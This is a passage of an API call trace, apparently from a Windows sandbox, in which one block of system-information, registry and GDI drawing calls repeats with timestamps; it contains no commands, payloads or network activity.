dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.877] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.877] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.877] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.877] BeginPath (hdc=0x0) returned 0 [0087.877] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.877] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.877] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.877] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.877] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.877] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.877] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.877] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.877] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x150401d0 [0087.877] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x170401cd [0087.877] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d2f [0087.877] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d30 [0087.877] CombineRgn (hrgnDst=0x1040d2f, hrgnSrc1=0x150401d0, hrgnSrc2=0x170401cd, iMode=1) returned 1 [0087.877] CombineRgn (hrgnDst=0x1040d30, hrgnSrc1=0x150401d0, hrgnSrc2=0x170401cd, iMode=4) returned 2 [0087.877] CreateSolidBrush (color=0xff) returned 0x2100d2e [0087.877] CreateSolidBrush (color=0xff0000) returned 0x1100d31 [0087.877] DeleteObject (ho=0x1100d31) returned 1 [0087.877] DeleteObject (ho=0x170401cd) returned 1 [0087.877] DeleteObject (ho=0x150401d0) returned 1 [0087.877] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.877] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.877] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.877] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.877] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.877] BeginPath (hdc=0x0) returned 0 [0087.877] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.878] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.878] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.878] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.878] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.878] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.878] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.878] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.878] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x180401cd [0087.878] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x160401d0 [0087.878] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d32 [0087.878] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d33 [0087.878] CombineRgn (hrgnDst=0x1040d32, hrgnSrc1=0x180401cd, hrgnSrc2=0x160401d0, iMode=1) returned 1 [0087.878] CombineRgn (hrgnDst=0x1040d33, hrgnSrc1=0x180401cd, hrgnSrc2=0x160401d0, iMode=4) returned 2 [0087.878] CreateSolidBrush (color=0xff) returned 0x2100d31 [0087.878] CreateSolidBrush (color=0xff0000) returned 0x1100d34 [0087.878] DeleteObject (ho=0x1100d34) returned 1 [0087.878] DeleteObject (ho=0x160401d0) returned 1 [0087.878] DeleteObject (ho=0x180401cd) returned 1 [0087.878] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.878] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.878] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.878] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.878] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.878] BeginPath (hdc=0x0) returned 0 [0087.878] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.878] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.878] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.878] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.878] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.878] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.878] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.878] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.878] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x170401d0 [0087.879] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x190401cd [0087.879] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d35 [0087.879] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d36 [0087.879] CombineRgn (hrgnDst=0x1040d35, hrgnSrc1=0x170401d0, hrgnSrc2=0x190401cd, iMode=1) returned 1 [0087.879] CombineRgn (hrgnDst=0x1040d36, hrgnSrc1=0x170401d0, hrgnSrc2=0x190401cd, iMode=4) returned 2 [0087.879] CreateSolidBrush (color=0xff) returned 0x2100d34 [0087.879] CreateSolidBrush (color=0xff0000) returned 0x1100d37 [0087.879] DeleteObject (ho=0x1100d37) returned 1 [0087.879] DeleteObject (ho=0x190401cd) returned 1 [0087.879] DeleteObject (ho=0x170401d0) returned 1 [0087.879] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.879] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.879] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.879] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.879] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.879] BeginPath (hdc=0x0) returned 0 [0087.879] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.879] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.879] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.879] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.879] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.879] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.879] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.879] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.879] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x1a0401cd [0087.879] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x180401d0 [0087.879] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d38 [0087.879] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d39 [0087.879] CombineRgn (hrgnDst=0x1040d38, hrgnSrc1=0x1a0401cd, hrgnSrc2=0x180401d0, iMode=1) returned 1 [0087.879] CombineRgn (hrgnDst=0x1040d39, hrgnSrc1=0x1a0401cd, hrgnSrc2=0x180401d0, iMode=4) returned 2 [0087.879] CreateSolidBrush (color=0xff) returned 0x2100d37 [0087.879] CreateSolidBrush (color=0xff0000) returned 0x1100d3a [0087.879] DeleteObject (ho=0x1100d3a) returned 1 [0087.879] DeleteObject (ho=0x180401d0) returned 1 [0087.879] DeleteObject (ho=0x1a0401cd) returned 1 [0087.879] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.879] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.880] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.880] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.880] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.880] BeginPath (hdc=0x0) returned 0 [0087.880] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.880] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.880] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.880] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.880] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.880] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.880] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.880] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.880] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x190401d0 [0087.880] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x1b0401cd [0087.880] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d3b [0087.880] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d3c [0087.880] CombineRgn (hrgnDst=0x1040d3b, hrgnSrc1=0x190401d0, hrgnSrc2=0x1b0401cd, iMode=1) returned 1 [0087.880] CombineRgn (hrgnDst=0x1040d3c, hrgnSrc1=0x190401d0, hrgnSrc2=0x1b0401cd, iMode=4) returned 2 [0087.880] CreateSolidBrush (color=0xff) returned 0x2100d3a [0087.880] CreateSolidBrush (color=0xff0000) returned 0x1100d3d [0087.880] DeleteObject (ho=0x1100d3d) returned 1 [0087.880] DeleteObject (ho=0x1b0401cd) returned 1 [0087.880] DeleteObject (ho=0x190401d0) returned 1 [0087.880] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.880] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.880] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.880] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.880] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.880] BeginPath (hdc=0x0) returned 0 [0087.880] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.880] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.880] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.880] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.880] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.880] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.880] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.881] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.881] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x1c0401cd [0087.881] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x1a0401d0 [0087.881] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d3e [0087.881] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d3f [0087.881] CombineRgn (hrgnDst=0x1040d3e, hrgnSrc1=0x1c0401cd, hrgnSrc2=0x1a0401d0, iMode=1) returned 1 [0087.881] CombineRgn (hrgnDst=0x1040d3f, hrgnSrc1=0x1c0401cd, hrgnSrc2=0x1a0401d0, iMode=4) returned 2 [0087.881] CreateSolidBrush (color=0xff) returned 0x2100d3d [0087.881] CreateSolidBrush (color=0xff0000) returned 0x1100d40 [0087.881] DeleteObject (ho=0x1100d40) returned 1 [0087.881] DeleteObject (ho=0x1a0401d0) returned 1 [0087.881] DeleteObject (ho=0x1c0401cd) returned 1 [0087.881] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.881] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.881] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.881] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.881] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.881] BeginPath (hdc=0x0) returned 0 [0087.881] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.881] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.881] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.881] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.881] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.881] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.881] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.881] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.881] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x1b0401d0 [0087.881] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x1d0401cd [0087.881] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d41 [0087.881] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d42 [0087.881] CombineRgn (hrgnDst=0x1040d41, hrgnSrc1=0x1b0401d0, hrgnSrc2=0x1d0401cd, iMode=1) returned 1 [0087.881] CombineRgn (hrgnDst=0x1040d42, hrgnSrc1=0x1b0401d0, hrgnSrc2=0x1d0401cd, iMode=4) returned 2 [0087.881] CreateSolidBrush (color=0xff) returned 0x2100d40 [0087.881] CreateSolidBrush (color=0xff0000) returned 0x1100d43 [0087.882] DeleteObject (ho=0x1100d43) returned 1 [0087.882] DeleteObject (ho=0x1d0401cd) returned 1 [0087.882] DeleteObject (ho=0x1b0401d0) returned 1 [0087.882] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.882] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.882] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.882] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.882] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.882] BeginPath (hdc=0x0) returned 0 [0087.882] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.882] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.882] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.882] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.882] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.882] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.882] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.882] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.882] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x1e0401cd [0087.882] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x1c0401d0 [0087.882] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d44 [0087.882] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d45 [0087.882] CombineRgn (hrgnDst=0x1040d44, hrgnSrc1=0x1e0401cd, hrgnSrc2=0x1c0401d0, iMode=1) returned 1 [0087.882] CombineRgn (hrgnDst=0x1040d45, hrgnSrc1=0x1e0401cd, hrgnSrc2=0x1c0401d0, iMode=4) returned 2 [0087.882] CreateSolidBrush (color=0xff) returned 0x2100d43 [0087.882] CreateSolidBrush (color=0xff0000) returned 0x1100d46 [0087.882] DeleteObject (ho=0x1100d46) returned 1 [0087.882] DeleteObject (ho=0x1c0401d0) returned 1 [0087.882] DeleteObject (ho=0x1e0401cd) returned 1 [0087.882] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.882] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.882] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.882] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.882] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.882] BeginPath (hdc=0x0) returned 0 [0087.882] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.882] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.883] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.883] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.883] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.883] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.883] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.883] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.883] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x1d0401d0 [0087.883] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x1f0401cd [0087.883] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d47 [0087.883] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d48 [0087.883] CombineRgn (hrgnDst=0x1040d47, hrgnSrc1=0x1d0401d0, hrgnSrc2=0x1f0401cd, iMode=1) returned 1 [0087.883] CombineRgn (hrgnDst=0x1040d48, hrgnSrc1=0x1d0401d0, hrgnSrc2=0x1f0401cd, iMode=4) returned 2 [0087.883] CreateSolidBrush (color=0xff) returned 0x2100d46 [0087.883] CreateSolidBrush (color=0xff0000) returned 0x1100d49 [0087.883] DeleteObject (ho=0x1100d49) returned 1 [0087.883] DeleteObject (ho=0x1f0401cd) returned 1 [0087.883] DeleteObject (ho=0x1d0401d0) returned 1 [0087.883] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.883] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.883] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.883] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.883] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.883] BeginPath (hdc=0x0) returned 0 [0087.883] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.883] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.883] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.883] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.883] 